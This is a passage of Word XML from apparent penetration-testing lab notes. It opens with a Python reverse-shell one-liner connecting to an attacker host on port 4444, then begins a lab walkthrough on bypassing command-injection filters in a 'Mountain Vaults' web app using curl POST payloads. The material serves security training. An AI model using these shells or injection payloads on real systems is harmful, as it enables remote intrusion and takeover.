        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">export RHOST="</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">";export RPORT=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DEC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DED">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">URL-encode </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">it (select the text inside Repeater and then press </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CTRL+U</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) to ensure the application passes the request properly; the final POST request looks as follows</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3746500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="241" name="image250.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image250.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId297"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3746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DEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="666"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace the RHOST and RPORT with the correct values for you. And remember that that RHOST is going to be your local IP! Not the target IP. Since this is a reverseshell. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DF0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DF1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6486an83jfcw" w:id="123"/>
      <w:bookmarkEnd w:id="123"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to bypass command injection filters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DF3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DF4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From XXXXXXXXX (9.4.1. OS Command Injection), we found that an application allowed for command injection, but only for commands starting with "git", so we learned how to bypass that.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DF5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DF6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web applications often need to interact with the underlying operating system, such as when a file is created through a file upload mechanism. Web applications should always offer specific APIs or functionalities that use prepared commands for the interaction with the system. Prepared commands provide a set of functions to the underlying system that cannot be changed by user input. However, these APIs and functions are often very time consuming to plan and develop.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DF7">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes a web application needs to address a multitude of different cases, and a set of predefined functions can be too inflexible. In these cases, web developers often tend to directly accept user input, then sanitize it. This means that user input is filtered for any command sequences that might try to change the application's behavior for malicious purposes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DF8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For this demonstration, let's review the "Mountain Vaults" web application, running on port 8000 on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MOUNTAIN</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> system. We can open it in our browser by navigating to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.50.189:8000</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DF9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1816100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 23: Modified Web Content and new Input Textbox" id="249" name="image251.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 23: Modified Web Content and new Input Textbox" id="0" name="image251.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId298"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1816100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 23: Modified Web Content and new Input Textbox</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DFA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 23 shows an updated version of the application. In this version, we're able to clone git repositories by entering the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command combined with a URL. The example shows us the same command we would use in the command line. We can hypothesize that maybe the operating system will execute this string and, therefore, we may be able to inject our own commands. Let's try to use the form to clone the</w:t>
      </w:r>
      <w:hyperlink r:id="rId299">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId300">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ExploitDB</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> repository.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DFB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1752600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 24: Clone command for the ExploitDB repository" id="398" name="image401.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 24: Clone command for the ExploitDB repository" id="0" name="image401.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId301"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1752600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 24: Clone command for the ExploitDB repository</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DFC">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After we click on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">submit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the cloning process of the ExploitDB repository starts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DFD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1066800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 25: Successfully cloned the ExploitDB Repository via the Web Application" id="426" name="image409.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 25: Successfully cloned the ExploitDB Repository via the Web Application" id="0" name="image409.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId302"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1066800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 25: Successfully cloned the ExploitDB Repository via the Web Application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DFE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output shows that the repository was successfully cloned.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000DFF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloning the repository will result in an error within the lab environment. However, to follow along the walkthrough we can just skip this step.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E00">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Furthermore, the actual command is displayed in the web application's output. Let's try to inject arbitrary commands such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ipconfig</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hostname</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We'll switch over to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP history</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Burp to understand the correct structure for the POST request. The request indicates the "Archive" parameter is used for the command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E01">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1536700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Figure 26: Archive Parameter in the POST request" id="433" name="image421.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Figure 26: Archive Parameter in the POST request" id="0" name="image421.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId303"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1536700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Figure 26: Archive Parameter in the POST request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E02">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The figure shows that the "Archive" parameter contains the Git command. This means we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to provide our own commands to the parameter. We'll do this by using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-X</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter to change the request type to POST. We'll also use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to specify what data is sent in the POST request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E03">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ curl -X POST --data 'Archive=ipconfig' http://192.168.50.189:8000/archive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E04">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E05">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Injection detected. Aborting...%!(EXTRA string=ipconfig)      </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E07">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="600" w:right="600" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 40 - Detected Command Injection for ipconfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000E08">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On our first try, the web application shows that it detected a command injection attempt with the </w:t>
      </w:r>
